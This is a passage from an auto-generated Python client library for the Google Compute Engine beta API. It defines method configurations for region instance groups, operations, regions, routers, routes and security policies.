global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionInstanceGroupManagerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionInstanceGroupManagers.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersListRequest',
response_type_name=u'RegionInstanceGroupManagerList',
supports_download=False,
)
def ListManagedInstances(self, request, global_params=None):
"""Lists the instances in the managed instance group and instances that are scheduled to be created. The list includes any current actions that the group has scheduled for its instances.
Args:
request: (ComputeRegionInstanceGroupManagersListManagedInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionInstanceGroupManagersListInstancesResponse) The response message.
"""
config = self.GetMethodConfig('ListManagedInstances')
return self._RunMethod(
config, request, global_params=global_params)
ListManagedInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.listManagedInstances',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/listManagedInstances',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersListManagedInstancesRequest',
response_type_name=u'RegionInstanceGroupManagersListInstancesResponse',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a managed instance group using the information that you specify in the request. This operation is marked as DONE when the group is patched even if the instances in the group are still in the process of being patched. You must separately verify the status of the individual instances with the listmanagedinstances method. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeRegionInstanceGroupManagersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.regionInstanceGroupManagers.patch',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
request_field=u'instanceGroupManagerResource',
request_type_name=u'ComputeRegionInstanceGroupManagersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def RecreateInstances(self, request, global_params=None):
"""Schedules a group action to recreate the specified instances in the managed instance group. The instances are deleted and recreated using the current instance template for the managed instance group. This operation is marked as DONE when the action is scheduled even if the instances have not yet been recreated. You must separately verify the status of the recreating action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeRegionInstanceGroupManagersRecreateInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RecreateInstances')
return self._RunMethod(
config, request, global_params=global_params)
RecreateInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.recreateInstances',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/recreateInstances',
request_field=u'regionInstanceGroupManagersRecreateRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersRecreateInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Resize(self, request, global_params=None):
"""Changes the intended size for the managed instance group. If you increase the size, the group schedules actions to create new instances using the current instance template. If you decrease the size, the group schedules delete actions on one or more instances. The resize operation is marked DONE when the resize actions are scheduled even if the group has not yet added or deleted any instances. You must separately verify the status of the creating or deleting actions with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
Args:
request: (ComputeRegionInstanceGroupManagersResizeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Resize')
return self._RunMethod(
config, request, global_params=global_params)
Resize.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.resize',
ordered_params=[u'project', u'region', u'instanceGroupManager', u'size'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId', u'size'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/resize',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersResizeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetAutoHealingPolicies(self, request, global_params=None):
"""Modifies the autohealing policy for the instances in this managed instance group.
Args:
request: (ComputeRegionInstanceGroupManagersSetAutoHealingPoliciesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetAutoHealingPolicies')
return self._RunMethod(
config, request, global_params=global_params)
SetAutoHealingPolicies.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.setAutoHealingPolicies',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setAutoHealingPolicies',
request_field=u'regionInstanceGroupManagersSetAutoHealingRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersSetAutoHealingPoliciesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetInstanceTemplate(self, request, global_params=None):
"""Sets the instance template to use when creating new instances or recreating instances in this group. Existing instances are not affected.
Args:
request: (ComputeRegionInstanceGroupManagersSetInstanceTemplateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetInstanceTemplate')
return self._RunMethod(
config, request, global_params=global_params)
SetInstanceTemplate.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.setInstanceTemplate',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setInstanceTemplate',
request_field=u'regionInstanceGroupManagersSetTemplateRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersSetInstanceTemplateRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetTargetPools(self, request, global_params=None):
"""Modifies the target pools to which all new instances in this group are assigned. Existing instances in the group are not affected.
Args:
request: (ComputeRegionInstanceGroupManagersSetTargetPoolsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTargetPools')
return self._RunMethod(
config, request, global_params=global_params)
SetTargetPools.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.setTargetPools',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setTargetPools',
request_field=u'regionInstanceGroupManagersSetTargetPoolsRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersSetTargetPoolsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRegionInstanceGroupManagersTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates a managed instance group using the information that you specify in the request. This operation is marked as DONE when the group is updated even if the instances in the group have not yet been updated. You must separately verify the status of the individual instances with the listmanagedinstances method.
Args:
request: (ComputeRegionInstanceGroupManagersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.regionInstanceGroupManagers.update',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
request_field=u'instanceGroupManagerResource',
request_type_name=u'ComputeRegionInstanceGroupManagersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionInstanceGroupsService(base_api.BaseApiService):
"""Service class for the regionInstanceGroups resource."""
_NAME = u'regionInstanceGroups'
def __init__(self, client):
super(ComputeBeta.RegionInstanceGroupsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified instance group resource.
Args:
request: (ComputeRegionInstanceGroupsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroup) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionInstanceGroups.get',
ordered_params=[u'project', u'region', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupsGetRequest',
response_type_name=u'InstanceGroup',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of instance group resources contained within the specified region.
Args:
request: (ComputeRegionInstanceGroupsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionInstanceGroupList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionInstanceGroups.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/instanceGroups',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupsListRequest',
response_type_name=u'RegionInstanceGroupList',
supports_download=False,
)
def ListInstances(self, request, global_params=None):
"""Lists the instances in the specified instance group and displays information about the named ports. Depending on the specified options, this method can list all instances or only the instances that are running.
Args:
request: (ComputeRegionInstanceGroupsListInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionInstanceGroupsListInstances) The response message.
"""
config = self.GetMethodConfig('ListInstances')
return self._RunMethod(
config, request, global_params=global_params)
ListInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroups.listInstances',
ordered_params=[u'project', u'region', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}/listInstances',
request_field=u'regionInstanceGroupsListInstancesRequest',
request_type_name=u'ComputeRegionInstanceGroupsListInstancesRequest',
response_type_name=u'RegionInstanceGroupsListInstances',
supports_download=False,
)
def SetNamedPorts(self, request, global_params=None):
"""Sets the named ports for the specified regional instance group.
Args:
request: (ComputeRegionInstanceGroupsSetNamedPortsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetNamedPorts')
return self._RunMethod(
config, request, global_params=global_params)
SetNamedPorts.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroups.setNamedPorts',
ordered_params=[u'project', u'region', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}/setNamedPorts',
request_field=u'regionInstanceGroupsSetNamedPortsRequest',
request_type_name=u'ComputeRegionInstanceGroupsSetNamedPortsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRegionInstanceGroupsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroups.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroups/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRegionInstanceGroupsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class RegionOperationsService(base_api.BaseApiService):
"""Service class for the regionOperations resource."""
_NAME = u'regionOperations'
def __init__(self, client):
super(ComputeBeta.RegionOperationsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified region-specific Operations resource.
Args:
request: (ComputeRegionOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ComputeRegionOperationsDeleteResponse) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionOperations.delete',
ordered_params=[u'project', u'region', u'operation'],
path_params=[u'operation', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/operations/{operation}',
request_field='',
request_type_name=u'ComputeRegionOperationsDeleteRequest',
response_type_name=u'ComputeRegionOperationsDeleteResponse',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Retrieves the specified region-specific Operations resource.
Args:
request: (ComputeRegionOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionOperations.get',
ordered_params=[u'project', u'region', u'operation'],
path_params=[u'operation', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/operations/{operation}',
request_field='',
request_type_name=u'ComputeRegionOperationsGetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of Operation resources contained within the specified region.
Args:
request: (ComputeRegionOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(OperationList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionOperations.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/operations',
request_field='',
request_type_name=u'ComputeRegionOperationsListRequest',
response_type_name=u'OperationList',
supports_download=False,
)
class RegionsService(base_api.BaseApiService):
"""Service class for the regions resource."""
_NAME = u'regions'
def __init__(self, client):
super(ComputeBeta.RegionsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified Region resource. Get a list of available regions by making a list() request.
Args:
request: (ComputeRegionsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Region) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regions.get',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}',
request_field='',
request_type_name=u'ComputeRegionsGetRequest',
response_type_name=u'Region',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of region resources available to the specified project.
Args:
request: (ComputeRegionsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regions.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions',
request_field='',
request_type_name=u'ComputeRegionsListRequest',
response_type_name=u'RegionList',
supports_download=False,
)
class RoutersService(base_api.BaseApiService):
"""Service class for the routers resource."""
_NAME = u'routers'
def __init__(self, client):
super(ComputeBeta.RoutersService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of routers.
Args:
request: (ComputeRoutersAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RouterAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routers.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/routers',
request_field='',
request_type_name=u'ComputeRoutersAggregatedListRequest',
response_type_name=u'RouterAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified Router resource.
Args:
request: (ComputeRoutersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.routers.delete',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/routers/{router}',
request_field='',
request_type_name=u'ComputeRoutersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Router resource. Get a list of available routers by making a list() request.
Args:
request: (ComputeRoutersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Router) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routers.get',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{router}',
request_field='',
request_type_name=u'ComputeRoutersGetRequest',
response_type_name=u'Router',
supports_download=False,
)
def GetRouterStatus(self, request, global_params=None):
"""Retrieves runtime information of the specified router.
Args:
request: (ComputeRoutersGetRouterStatusRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RouterStatusResponse) The response message.
"""
config = self.GetMethodConfig('GetRouterStatus')
return self._RunMethod(
config, request, global_params=global_params)
GetRouterStatus.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routers.getRouterStatus',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{router}/getRouterStatus',
request_field='',
request_type_name=u'ComputeRoutersGetRouterStatusRequest',
response_type_name=u'RouterStatusResponse',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a Router resource in the specified project and region using the data included in the request.
Args:
request: (ComputeRoutersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.routers.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/routers',
request_field=u'router',
request_type_name=u'ComputeRoutersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of Router resources available to the specified project.
Args:
request: (ComputeRoutersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RouterList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routers.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/routers',
request_field='',
request_type_name=u'ComputeRoutersListRequest',
response_type_name=u'RouterList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified Router resource with the data included in the request. This method supports PATCH semantics and uses JSON merge patch format and processing rules.
Args:
request: (ComputeRoutersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.routers.patch',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/routers/{router}',
request_field=u'routerResource',
request_type_name=u'ComputeRoutersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Preview(self, request, global_params=None):
"""Preview fields auto-generated during router create and update operations. Calling this method does NOT create or update the router.
Args:
request: (ComputeRoutersPreviewRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RoutersPreviewResponse) The response message.
"""
config = self.GetMethodConfig('Preview')
return self._RunMethod(
config, request, global_params=global_params)
Preview.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.routers.preview',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{router}/preview',
request_field=u'routerResource',
request_type_name=u'ComputeRoutersPreviewRequest',
response_type_name=u'RoutersPreviewResponse',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRoutersTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.routers.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRoutersTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified Router resource with the data included in the request.
Args:
request: (ComputeRoutersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.routers.update',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/routers/{router}',
request_field=u'routerResource',
request_type_name=u'ComputeRoutersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RoutesService(base_api.BaseApiService):
"""Service class for the routes resource."""
_NAME = u'routes'
def __init__(self, client):
super(ComputeBeta.RoutesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified Route resource.
Args:
request: (ComputeRoutesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.routes.delete',
ordered_params=[u'project', u'route'],
path_params=[u'project', u'route'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/routes/{route}',
request_field='',
request_type_name=u'ComputeRoutesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Route resource. Get a list of available routes by making a list() request.
Args:
request: (ComputeRoutesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Route) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routes.get',
ordered_params=[u'project', u'route'],
path_params=[u'project', u'route'],
query_params=[],
relative_path=u'projects/{project}/global/routes/{route}',
request_field='',
request_type_name=u'ComputeRoutesGetRequest',
response_type_name=u'Route',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a Route resource in the specified project using the data included in the request.
Args:
request: (ComputeRoutesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.routes.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/routes',
request_field=u'route',
request_type_name=u'ComputeRoutesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of Route resources available to the specified project.
Args:
request: (ComputeRoutesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RouteList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routes.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/routes',
request_field='',
request_type_name=u'ComputeRoutesListRequest',
response_type_name=u'RouteList',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeRoutesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.routes.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/routes/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeRoutesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class SecurityPoliciesService(base_api.BaseApiService):
"""Service class for the securityPolicies resource."""
_NAME = u'securityPolicies'
def __init__(self, client):
super(ComputeBeta.SecurityPoliciesService, self).__init__(client)
self._upload_configs = {
}
def AddRule(self, request, global_params=None):
"""Inserts a rule into a security policy.
Args:
request: (ComputeSecurityPoliciesAddRuleRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddRule')
return self._RunMethod(
config, request, global_params=global_params)
AddRule.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.securityPolicies.addRule',
ordered_params=[u'project', u'securityPolicy'],
path_params=[u'project', u'securityPolicy'],
query_params=[],
relative_path=u'projects/{project}/global/securityPolicies/{securityPolicy}/addRule',
request_field=u'securityPolicyRule',
request_type_name=u'ComputeSecurityPoliciesAddRuleRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified policy.
Args:
request: (ComputeSecurityPoliciesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.securityPolicies.delete',
ordered_params=[u'project', u'securityPolicy'],
path_params=[u'project', u'securityPolicy'],
query_params=[u'requestId'],
